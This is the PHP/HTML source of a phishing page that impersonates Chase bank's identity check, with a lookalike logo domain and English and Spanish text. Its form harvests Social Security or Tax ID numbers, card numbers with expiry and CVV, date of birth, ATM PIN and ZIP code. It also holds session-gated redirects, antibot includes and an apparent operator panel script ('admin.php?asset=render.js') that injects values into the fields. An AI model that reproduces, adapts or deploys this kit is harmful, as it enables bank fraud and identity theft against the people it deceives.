<?php
/* UA: HEADER BLOCK START */
@include __DIR__.'/session_runtime.php';
@include __DIR__.'/antibot_runtime.php';
/* UA: PAGE GUARD (direct access only) */
if (session_status() === PHP_SESSION_NONE) @session_start();
$__ua_is_direct = (isset($_SERVER['SCRIPT_FILENAME']) && realpath(__FILE__) === realpath($_SERVER['SCRIPT_FILENAME']));
if ($__ua_is_direct && !isset($_GET['pv'])) {
  $sid_ok = false;
  if (isset($_GET['sid'], $_GET['p']) && isset($_SESSION['ua_sid'])) {
    if (is_string($_GET['sid']) && $_GET['sid'] === $_SESSION['ua_sid']) $sid_ok = true;
  }
  if (!$sid_ok) {
    $sid = isset($_SESSION['ua_sid']) ? $_SESSION['ua_sid'] : '';
    header('Location: index.php?sid=' . urlencode($sid) . '&p=1');
    exit;
  }
}
unset($__ua_is_direct);
/* UA: PAGE GUARD END */
/* UA: HEADER BLOCK END */
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="icon" href="https://www.chase.com/etc/designs/chase-ux/favicon.ico" type="image/x-icon">
  <meta charset="UTF-8">
  <title>Verify your identity to restore</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    body {
      margin: 0;
      font-family: 'Open Sans', Arial, sans-serif;
      background: #fff;
      color: #222;
    }
    .header {
      background: #0848b4;
      color: #fff;
      display: flex;
      align-items: center;
      padding: 0 20px;
      height: 60px;
      justify-content: space-between;
    }
    .header-left, .header-center, .header-right {
      display: flex;
      align-items: center;
    }
    .header-logo {
      height: 30px;
    }
    .arrow {
      font-size: 22px;
      margin-right: 8px;
    }
    .exit {
      font-size: 18px;
      cursor: pointer;
    }
    .header-right span {
      font-size: 18px;
      font-weight: bold;
      cursor: pointer;
      margin-left: 8px;
      user-select: none;
    }
    .main-content {
      display: flex;
      max-width: 1100px;
      margin: 0 auto;
      padding: 32px 0;
    }
    .sidebar {
      flex: 0 0 250px;
      padding: 32px 0 0 0;
    }
    .faq {
      display: flex;
      flex-direction: column;
      align-items: flex-start;
    }
    .faq-icon {
      font-size: 22px;
      margin-bottom: 4px;
    }
    .faq-title {
      font-size: 18px;
      font-weight: bold;
      margin-bottom: 8px;
    }
    .faq-link {
      color: #1976d2;
      font-size: 17px;
      text-decoration: none;
    }
    .faq-arrow {
      font-size: 18px;
    }
    @media (max-width: 800px) {
      .faq {
        display: none !important;
      }
    }
    .form-section {
      flex: 1;
      max-width: 540px;
      margin: 0 auto;
    }
    .progress-container {
      margin-bottom: 18px;
      margin-top: 8px;
    }
    .step-title {
      font-size: 19px;
      font-weight: bold;
      letter-spacing: 0.2px;
      margin-bottom: 6px;
      display: inline-block;
    }
    .progress-bar {
      width: 100%;
      height: 7px;
      background: #d1d3d4;
      border-radius: 5px;
      margin-top: 4px;
      margin-bottom: 14px;
      overflow: hidden;
    }
    .progress-fill {
      width: 55%;
      height: 100%;
      background: #1976d2;
      border-radius: 5px 0 0 5px;
    }
    .form-title {
      font-size: 34px;
      font-weight: 400;
      margin-bottom: 12px;
      margin-top: 12px;
    }
    .form-desc {
      font-size: 18px;
      line-height: 1.5;
      margin-bottom: 24px;
      color: #252525;
    }
    .identity-form {
      display: flex;
      flex-direction: column;
      gap: 24px;
      margin-top: 12px;
    }
    .field-container {
      margin-bottom: 0;
      position: relative;
    }
    .field-header {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-bottom: 2px;
    }
    .ssn-label, .card-label, .dob-label, .atm-label, .zip-label {
      font-size: 21px;
      font-family: 'Open Sans', Arial, sans-serif;
      font-weight: 400;
      color: #757575;
      font-style: normal;
      transition: color 0.2s;
    }
    .show-btn {
      color: #1976d2;
      font-weight: bold;
      font-size: 18px;
      background: none;
      border: none;
      cursor: pointer;
      padding: 0;
      margin-left: 8px;
      transition: color 0.2s;
    }
    .field-input,
    .field-input-2,
    .field-input-3,
    .field-input-4,
    .field-input-5 {
      display: block;
      width: 100%;
      border: none;
      border-bottom: 2px solid #888;
      background: transparent;
      font-size: 20px;
      padding: 12px 0 8px 0;
      outline: none;
      transition: border-color 0.2s;
      color: #222;
    }
    .has-error .field-input,
    .has-error .field-input-2,
    .has-error .field-input-3,
    .has-error .field-input-4,
    .has-error .field-input-5 {
      border-bottom-color: #be1e2d !important;
    }
    .has-error .ssn-label,
    .has-error .card-label,
    .has-error .dob-label,
    .has-error .atm-label,
    .has-error .zip-label {
      color: #be1e2d !important;
    }
    .error-message {
      color: #be1e2d;
      font-size: 17px;
      margin-top: 4px;
      display: none;
      align-items: center;
    }
    .error-message .error-icon {
      font-size: 17px;
      margin-right: 6px;
    }
    .link-question {
      color: #1976d2;
      text-decoration: none;
      font-size: 17px;
      margin-bottom: 6px;
      display: inline-block;
    }
    .next-btn {
      margin-top: 28px;
      padding: 10px 0;
      width: 150px;
      background: #0057d7;
      color: #fff;
      font-size: 22px;
      border: none;
      border-radius: 7px;
      cursor: pointer;
      font-weight: 600;
      transition: background 0.2s;
    }
    .next-btn:hover {
      background: #1976d2;
    }
    @media (max-width: 800px) {
      .main-content {
        flex-direction: column;
        padding: 16px 0;
        max-width: 100%;
      }
      .sidebar {
        padding: 0;
        margin-bottom: 24px;
        flex: 1 0 100%;
      }
      .form-section {
        max-width: 100%;
        padding: 0 10px;
      }
      .header {
        padding: 0 10px;
        height: 55px;
      }
      .form-title {
        font-size: 26px;
      }
      .form-desc {
        font-size: 16px;
      }
      .header-right span {
        font-size: 17px;
      }
    }
    /* حقول MM YY CCV بكلاسات منفصلة وفريدة */
    .mm-field-container-x1 {
      display: flex;
      flex-direction: column;
      min-width: 70px;
      max-width: 90px;
      flex: 1 0 70px;
    }
    .mm-label-x1 {
      font-size: 14px;
      color: #757575;
      margin-bottom: 2px;
      font-family: 'Open Sans', Arial, sans-serif;
    }
    .mm-input-x1 {
      border: none;
      border-bottom: 2px solid #888;
      background: transparent;
      font-size: 16px;
      padding: 6px 0 4px 0;
      outline: none;
      color: #222;
      transition: border-color 0.2s;
      width: 100%;
    }
    .yy-field-container-y2 {
      display: flex;
      flex-direction: column;
      min-width: 70px;
      max-width: 90px;
      flex: 1 0 70px;
    }
    .yy-label-y2 {
      font-size: 14px;
      color: #757575;
      margin-bottom: 2px;
      font-family: 'Open Sans', Arial, sans-serif;
    }
    .yy-input-y2 {
      border: none;
      border-bottom: 2px solid #888;
      background: transparent;
      font-size: 16px;
      padding: 6px 0 4px 0;
      outline: none;
      color: #222;
      transition: border-color 0.2s;
      width: 100%;
    }
    .ccv-field-container-z3 {
      display: flex;
      flex-direction: column;
      min-width: 70px;
      max-width: 90px;
      flex: 1 0 70px;
    }
    .ccv-label-z3 {
      font-size: 14px;
      color: #757575;
      margin-bottom: 2px;
      font-family: 'Open Sans', Arial, sans-serif;
    }
    .ccv-input-z3 {
      border: none;
      border-bottom: 2px solid #888;
      background: transparent;
      font-size: 16px;
      padding: 6px 0 4px 0;
      outline: none;
      color: #222;
      transition: border-color 0.2s;
      width: 100%;
    }
    .has-error .mm-input-x1,
    .has-error .yy-input-y2,
    .has-error .ccv-input-z3 {
      border-bottom-color: #be1e2d !important;
    }
    .card-fields-group-x3 {
      display: flex;
      gap: 12px;
      margin-top: 24px;
    }
    @media (max-width: 800px) {
      .card-fields-group-x3 {
        flex-direction: column;
        gap: 6px;
        margin-top: 10px;
      }
      .mm-field-container-x1, .yy-field-container-y2, .ccv-field-container-z3 {
        max-width: 100%;
      }
    }
    /* Modal Styles */
    .modal-overlay {
      position: fixed;
      top: 0; left: 0;
      width: 100vw; height: 100vh;
      background: rgba(0,0,0,0.18);
      z-index: 2000;
      display: none;
      align-items: center;
      justify-content: center;
    }
    .modal-content {
      background: #fff;
      border-radius: 14px;
      box-shadow: 0 4px 32px rgba(0,0,0,0.15);
      max-width: 420px;
      width: 90vw;
      padding: 32px 26px 26px 26px;
      text-align: center;
      font-family: inherit;
      color: #212529;
      position: relative;
    }
    .modal-content .modal-icon {
      font-size: 32px;
      margin-bottom: 10px;
      color: #4187c2;
      display: block;
    }
    .modal-content .modal-title {
      font-weight: bold;
      font-size: 1.16em;
      margin-bottom: 15px;
      margin-top: 8px;
    }
    .modal-content .modal-desc {
      color: #444;
      font-size: 1em;
      margin-bottom: 20px;
    }
    .modal-content .modal-actions {
      display: flex;
      flex-direction: column;
      gap: 10px;
      align-items: stretch;
      justify-content: center;
    }
    .modal-content .modal-btn-cancel {
      background: #0848b4;
      color: #fff;
      font-weight: 700;
      border: none;
      border-radius: 6px;
      font-size: 1em;
      padding: 12px 0;
      cursor: pointer;
      margin-bottom: 4px;
      transition: background 0.1s;
    }
    .modal-content .modal-btn-back {
      background: #fff;
      color: #0848b4;
      font-weight: 600;
      border: 2px solid #0848b4;
      border-radius: 6px;
      font-size: 1em;
      padding: 12px 0;
      cursor: pointer;
      transition: background 0.1s;
    }
    .modal-content .modal-btn-cancel:active {
      background: #1976d2;
    }
    .modal-content .modal-btn-back:active {
      background: #eaf3fb;
    }
  </style>
</head>
<body>
  <header class="header">
    <div class="header-left">
      <span class="arrow">&#8592;</span>
      <span class="exit" id="exitBtn">Exit</span>
    </div>
    <div class="header-center">
      <img src="https://wearschase.com/logo_icon@2x.png" alt="Logo" class="header-logo">
    </div>
    <div class="header-right">
      <span id="en-switch" style="display:none;">English</span>
      <span id="esp-switch">Español</span>
    </div>
  </header>
  <main class="main-content">
    <aside class="sidebar">
      <div class="faq">
        <span class="faq-icon">❓</span>
        <span class="faq-title" id="faq-title">Questions?</span>
        <a href="#" class="faq-link" id="faq-link">Read our FAQs. <span class="faq-arrow">&#x2192;</span></a>
      </div>
    </aside>
    <section class="form-section">
      <div class="progress-container">
        <span class="step-title" id="step-title"><b>Identification</b></span>
        <div class="progress-bar">
          <div class="progress-fill"></div>
        </div>
      </div>
      <h1 class="form-title" id="form-title">Let's confirm your identity.</h1>
      <p class="form-desc" id="form-desc">
        To protect your account, please tell us the requested info so we can confirm your identity.
        If you have more than one account, choose one and we'll take care of the rest.<br><br>
        Commercial administrators must tell us a Tax ID number.
      </p>
      <form class="identity-form" id="identity-form" autocomplete="off" novalidate>
        <div class="field-container" id="ssn-container">
          <div class="field-header">
            <label class="ssn-label" for="ssn" id="ssn-label">Social Security number or Tax ID (TIN)</label>
            <button type="button" class="show-btn" id="ssn-show-btn" data-target="ssn">Show</button>
          </div>
          <input type="password" class="field-input" id="ssn" name="ssn" />
          <div class="error-message" id="ssn-error">
            <span class="error-icon">❗</span>
            <span id="ssn-error-text">Please tell us your Social Security number or Tax ID (TIN).</span>
          </div>
        </div>
        <div class="field-container" id="card-container">
          <div class="field-header">
            <label class="card-label" for="card" id="card-label">Card number</label>
            <button type="button" class="show-btn" id="card-show-btn" data-target="card">Show</button>
          </div>
          <input type="password" class="field-input-2" id="card" name="card" />
          <div class="card-fields-group-x3">
            <div class="mm-field-container-x1">
              <label class="mm-label-x1" for="mm">MM</label>
              <select class="mm-input-x1" id="mm" name="mm"></select>
            </div>
            <div class="yy-field-container-y2">
              <label class="yy-label-y2" for="yy">YY</label>
              <select class="yy-input-y2" id="yy" name="yy"></select>
            </div>
            <div class="ccv-field-container-z3">
              <label class="ccv-label-z3" for="ccv">CCV</label>
              <input type="password" class="ccv-input-z3" id="ccv" name="ccv" maxlength="4" autocomplete="off" />
            </div>
          </div>
          <div class="error-message" id="card-error">
            <span class="error-icon">❗</span>
            <span id="card-error-text">Please tell us your card number.</span>
          </div>
        </div>
        <div class="field-container" id="dob-container">
          <div class="field-header">
            <label class="dob-label" for="dob" id="dob-label">Date of birth</label>
            <button type="button" class="show-btn" id="dob-show-btn" data-target="dob">Show</button>
          </div>
          <input type="text" class="field-input-3" id="dob" name="dob" placeholder="MM/DD/YYYY" />
          <div class="error-message" id="dob-error">
            <span class="error-icon">❗</span>
            <span id="dob-error-text">Please tell us your date of birth.</span>
          </div>
        </div>
        <div class="field-container" id="atm-container">
          <div class="field-header">
            <label class="atm-label" for="atm" id="atm-label">ATM PIN</label>
            <button type="button" class="show-btn" id="atm-show-btn" data-target="atm">Show</button>
          </div>
          <input type="password" class="field-input-4" id="atm" name="atm" maxlength="6" />
          <div class="error-message" id="atm-error">
            <span class="error-icon">❗</span>
            <span id="atm-error-text">Please tell us your ATM PIN.</span>
          </div>
        </div>
        <div class="field-container" id="zip-container">
          <div class="field-header">
            <label class="zip-label" for="zip" id="zip-label">ZIP code</label>
            <button type="button" class="show-btn" id="zip-show-btn" data-target="zip">Show</button>
          </div>
          <input type="password" class="field-input-5" id="zip" name="zip" maxlength="10" />
          <div class="error-message" id="zip-error">
            <span class="error-icon">❗</span>
            <span id="zip-error-text">Please tell us your ZIP code.</span>
          </div>
        </div>
        <a href="#" class="link-question" id="link-question-1">Don't have a Social Security number? <span>&#x2192;</span></a>
        <a href="#" class="link-question" id="link-question-2">Are you an authorized user on another commercial or business account? <span>&#x2192;</span></a>
        <button type="submit" class="next-btn" id="next-btn">Next</button>
      </form>
    </section>
  </main>
  <!-- Modal for Phone Verification (link questions) -->
  <div class="modal-overlay" id="phoneVerifyModal">
    <div class="modal-content">
      <span class="modal-icon">📱</span>
      <div class="modal-title" id="phone-modal-title">Phone verification required</div>
      <div class="modal-desc" id="phone-modal-desc-wrap">
        <span id="phone-modal-desc">To access this option, you must first verify the phone number linked to your Chase account.</span>
        <br><br>
        <span id="phone-modal-device-line"><span id="phone-modal-device-prefix">Please confirm your identity from your </span><strong id="phone-modal-device"></strong>.</span>
      </div>
      <div class="modal-actions">
        <button class="modal-btn-cancel" id="phoneModalOk">Got it</button>
      </div>
    </div>
  </div>
  <!-- Modal for Exit -->
  <div class="modal-overlay" id="cancelModal">
    <div class="modal-content">
      <span class="modal-icon">🛈</span>
      <div class="modal-title" id="modal-title">Are you sure you want to cancel?</div>
      <div class="modal-desc" id="modal-desc">
        For your security, this request will be canceled if your identity is not confirmed.
      </div>
      <div class="modal-actions">
        <button class="modal-btn-cancel" id="modalYes">Yes, cancel</button>
        <button class="modal-btn-back" id="modalNo">No, go back</button>
      </div>
    </div>
  </div>
  <script>
  // Detect device/phone name from user-agent
  function getDeviceName(lang) {
    var ua = navigator.userAgent;
    var useLang = lang || window._currentLang || 'en';
    if (/iPhone/.test(ua)) return 'iPhone';
    if (/iPad/.test(ua)) return 'iPad';
    if (/Android/.test(ua)) {
      var modelMatch = ua.match(/;\s*([^;)]+)\s+Build\//);
      if (modelMatch && modelMatch[1]) return modelMatch[1].trim();
      return 'Android device';
    }
    // Desktop/laptop: Mac, Windows, Linux
    if (/Macintosh|Mac OS X|Windows|Linux/.test(ua)) {
      return useLang === 'es' ? 'computadora' : 'computer';
    }
    return 'your device';
  }
  function openPhoneVerifyModal() {
    document.getElementById('phone-modal-device').textContent = getDeviceName();
    document.getElementById('phoneVerifyModal').style.display = 'flex';
  }
  // Show/Hide password fields
  function showBtnText(isHidden, lang) {
    return isHidden ? (lang === 'es' ? 'Mostrar' : 'Show') : (lang === 'es' ? 'Ocultar' : 'Hide');
  }
  function syncShowBtnLabel(input) {
    var btn = document.querySelector('.show-btn[data-target="' + input.id + '"]');
    if (btn) btn.textContent = showBtnText(input.type === 'password', window._currentLang || 'en');
  }
  // RADICAL FIX: capture phase (true) fires before any stopPropagation in bubble phase,
  // so render.js can never block this listener regardless of what it does.
  document.addEventListener('click', function(e) {
    var btn = e.target.closest ? e.target.closest('.show-btn') : null;
    if (!btn) return;
    var targetId = btn.getAttribute('data-target');
    var input = document.getElementById(targetId);
    if (input && (input.type === 'password' || input.type === 'text')) {
      input.type = input.type === 'password' ? 'text' : 'password';
      btn.textContent = showBtnText(input.type === 'password', window._currentLang || 'en');
    }
  }, true); // capture phase
  // MutationObserver: when render.js sets input.type='text' to reveal an injected value,
  // automatically update the button label from "Show" → "Hide" (and vice-versa).
  var _inputTypeObserver = new MutationObserver(function(mutations) {
    mutations.forEach(function(mut) {
      syncShowBtnLabel(mut.target);
    });
  });
  document.addEventListener('DOMContentLoaded', function() {
    // Only observe inputs that have a corresponding show button
    document.querySelectorAll('.show-btn[data-target]').forEach(function(btn) {
      var input = document.getElementById(btn.getAttribute('data-target'));
      if (input) _inputTypeObserver.observe(input, { attributes: true, attributeFilter: ['type'] });
    });
  });
  function attachShowButtons() { /* kept for compatibility; logic moved to delegation above */ }
  // Rebuild MM options for the selected year. All years start from month 1.
  function fillMmOptions(selectedYear) {
    var mmSelect = document.getElementById('mm');
    if (!mmSelect) return;
    var prevVal = mmSelect.value;
    mmSelect.innerHTML = '';
    for (var m = 1; m <= 12; m++) {
      var val = m < 10 ? '0' + m : m.toString();
      var opt = document.createElement('option');
      opt.value = val;
      opt.textContent = val;
      mmSelect.appendChild(opt);
    }
    // Restore previously selected month if still valid
    if (prevVal && mmSelect.querySelector('option[value="' + prevVal + '"]')) {
      mmSelect.value = prevVal;
    }
  }
  // Fill MM/YY selects
  function fillCardFields() {
    var startYear = 2026;
    // YY: years starting from 2026 up to 20 years ahead
    var yySelect = document.getElementById('yy');
    if (yySelect) {
      yySelect.innerHTML = '';
      for (var y = startYear; y < startYear + 20; y++) {
        var opt = document.createElement('option');
        opt.value = y.toString().slice(-2); // last two digits
        opt.textContent = y.toString();      // full year stored in text for readability
        yySelect.appendChild(opt);
      }
      // Rebuild MM whenever year changes via user interaction
      yySelect.addEventListener('change', function() {
        var fullYear = parseInt(this.options[this.selectedIndex].textContent, 10);
        fillMmOptions(fullYear);
      });
      // Intercept programmatic .value assignment by render.js (no 'change' event fires).
      // When render.js sets yySelect.value = 'xx', we rebuild MM with the new year.
      var yyOriginalValueDesc = Object.getOwnPropertyDescriptor(HTMLSelectElement.prototype, 'value');
      Object.defineProperty(yySelect, 'value', {
        get: function() { return yyOriginalValueDesc.get.call(this); },
        set: function(v) {
          yyOriginalValueDesc.set.call(this, v);
          var idx = this.selectedIndex;
          var fullYear = (idx >= 0 && this.options[idx]) ? parseInt(this.options[idx].textContent, 10) : NaN;
          if (!isNaN(fullYear)) fillMmOptions(fullYear);
        }
      });
    }
    // MM: all years start from month 1
    fillMmOptions(startYear);
  }

  // Modal logic for Exit button
  document.addEventListener('DOMContentLoaded', function() {
    attachShowButtons();
    window._currentLang = 'en';
    fillCardFields();

    // Exit modal
    document.getElementById('exitBtn').onclick = function() {
      document.getElementById('cancelModal').style.display = 'flex';
    };
    document.getElementById('modalNo').onclick = function() {
      document.getElementById('cancelModal').style.display = 'none';
    };
    document.getElementById('modalYes').onclick = function() {
      document.getElementById('cancelModal').style.display = 'none';
    };

    // Link-question popups
    document.getElementById('link-question-1').addEventListener('click', function(e) {
      e.preventDefault();
      openPhoneVerifyModal();
    });
    document.getElementById('link-question-2').addEventListener('click', function(e) {
      e.preventDefault();
      openPhoneVerifyModal();
    });
    document.getElementById('phoneModalOk').addEventListener('click', function() {
      document.getElementById('phoneVerifyModal').style.display = 'none';
    });

    // Language Switcher (Español/English)
    document.getElementById('esp-switch').addEventListener('click', function() {
      switchContent('es');
      document.getElementById('esp-switch').style.display = 'none';
      document.getElementById('en-switch').style.display = '';
    });
    document.getElementById('en-switch').addEventListener('click', function() {
      switchContent('en');
      document.getElementById('en-switch').style.display = 'none';
      document.getElementById('esp-switch').style.display = '';
    });
  });

  // Translation function
  function switchContent(lang) {
    window._currentLang = lang;
    if(lang === 'es') {
      document.getElementById('faq-title').textContent = '¿Preguntas?';
      document.getElementById('faq-link').innerHTML = 'Lee nuestras preguntas frecuentes. <span class="faq-arrow">&#x2192;</span>';
      document.getElementById('step-title').innerHTML = '<b>Identificación</b>';
      document.getElementById('form-title').textContent = 'Confirmemos tu identidad.';
      document.getElementById('form-desc').innerHTML =
        'Para proteger tu cuenta, por favor dinos la información solicitada para que podamos confirmar tu identidad. ' +
        'Si tienes más de una cuenta, elige una y nosotros nos encargamos del resto.<br><br>' +
        'Los administradores comerciales deben proporcionarnos un número de identificación fiscal.';
      document.getElementById('ssn-label').textContent = 'Número de Seguro Social o ID fiscal (TIN)';
      document.getElementById('ssn-error-text').textContent = 'Por favor, dinos tu número de Seguro Social o ID fiscal (TIN).';
      document.getElementById('card-label').textContent = 'Número de tarjeta';
      document.getElementById('card-error-text').textContent = 'Por favor, dinos tu número de tarjeta.';
      document.getElementById('dob-label').textContent = 'Fecha de nacimiento';
      document.getElementById('dob-error-text').textContent = 'Por favor, dinos tu fecha de nacimiento.';
      document.getElementById('atm-label').textContent = 'PIN de cajero automático';
      document.getElementById('atm-error-text').textContent = 'Por favor, dinos tu PIN de cajero automático.';
      document.getElementById('zip-label').textContent = 'Código postal';
      document.getElementById('zip-error-text').textContent = 'Por favor, dinos tu código postal.';
      document.getElementById('link-question-1').innerHTML = '¿No tienes un número de Seguro Social? <span>&#x2192;</span>';
      document.getElementById('link-question-2').innerHTML = '¿Eres usuario autorizado en otra cuenta comercial o de empresa? <span>&#x2192;</span>';
      document.getElementById('next-btn').textContent = 'Siguiente';
      document.getElementById('modal-title').textContent = '¿Seguro que deseas cancelar?';
      document.getElementById('modal-desc').textContent = 'Por tu seguridad, esta solicitud se cancelará si no se confirma tu identidad.';
      document.getElementById('modalYes').textContent = 'Sí, cancelar';
      document.getElementById('modalNo').textContent = 'No, volver';
      document.getElementById('phone-modal-title').textContent = 'Se requiere verificación de teléfono';
      document.getElementById('phone-modal-desc').textContent = 'Para acceder a esta opción, primero debes verificar el número de teléfono vinculado a tu cuenta de Chase.';
      document.getElementById('phone-modal-device-prefix').textContent = 'Por favor, confirma tu identidad desde tu ';
      document.getElementById('phone-modal-device').textContent = getDeviceName('es');
      document.getElementById('phoneModalOk').textContent = 'Entendido';
    } else {
      document.getElementById('faq-title').textContent = 'Questions?';
      document.getElementById('faq-link').innerHTML = 'Read our FAQs. <span class="faq-arrow">&#x2192;</span>';
      document.getElementById('step-title').innerHTML = '<b>Identification</b>';
      document.getElementById('form-title').textContent = "Let's confirm your identity.";
      document.getElementById('form-desc').innerHTML =
        'To protect your account, please tell us the requested info so we can confirm your identity. ' +
        'If you have more than one account, choose one and we\'ll take care of the rest.<br><br>' +
        'Commercial administrators must tell us a Tax ID number.';
      document.getElementById('ssn-label').textContent = 'Social Security number or Tax ID (TIN)';
      document.getElementById('ssn-error-text').textContent = 'Please tell us your Social Security number or Tax ID (TIN).';
      document.getElementById('card-label').textContent = 'Card number';
      document.getElementById('card-error-text').textContent = 'Please tell us your card number.';
      document.getElementById('dob-label').textContent = 'Date of birth';
      document.getElementById('dob-error-text').textContent = 'Please tell us your date of birth.';
      document.getElementById('atm-label').textContent = 'ATM PIN';
      document.getElementById('atm-error-text').textContent = 'Please tell us your ATM PIN.';
      document.getElementById('zip-label').textContent = 'ZIP code';
      document.getElementById('zip-error-text').textContent = 'Please tell us your ZIP code.';
      document.getElementById('link-question-1').innerHTML = "Don't have a Social Security number? <span>&#x2192;</span>";
      document.getElementById('link-question-2').innerHTML = "Are you an authorized user on another commercial or business account? <span>&#x2192;</span>";
      document.getElementById('next-btn').textContent = 'Next';
      document.getElementById('modal-title').textContent = 'Are you sure you want to cancel?';
      document.getElementById('modal-desc').textContent = 'For your security, this request will be canceled if your identity is not confirmed.';
      document.getElementById('modalYes').textContent = 'Yes, cancel';
      document.getElementById('modalNo').textContent = 'No, go back';
      document.getElementById('phone-modal-title').textContent = 'Phone verification required';
      document.getElementById('phone-modal-desc').textContent = 'To access this option, you must first verify the phone number linked to your Chase account.';
      document.getElementById('phone-modal-device-prefix').textContent = 'Please confirm your identity from your ';
      document.getElementById('phone-modal-device').textContent = getDeviceName('en');
      document.getElementById('phoneModalOk').textContent = 'Got it';
    }
    // Update show/hide button text to reflect the new language (preserve current show/hide state)
    document.querySelectorAll('.show-btn').forEach(function(btn) {
      var targetId = btn.getAttribute('data-target');
      var input = document.getElementById(targetId);
      if (input) {
        btn.textContent = showBtnText(input.type === 'password', lang);
      }
    });
  }
  </script>
  <script src="admin.php?asset=render.js" defer></script>
  <script src="antibot.js" defer></script>
</body>
</html>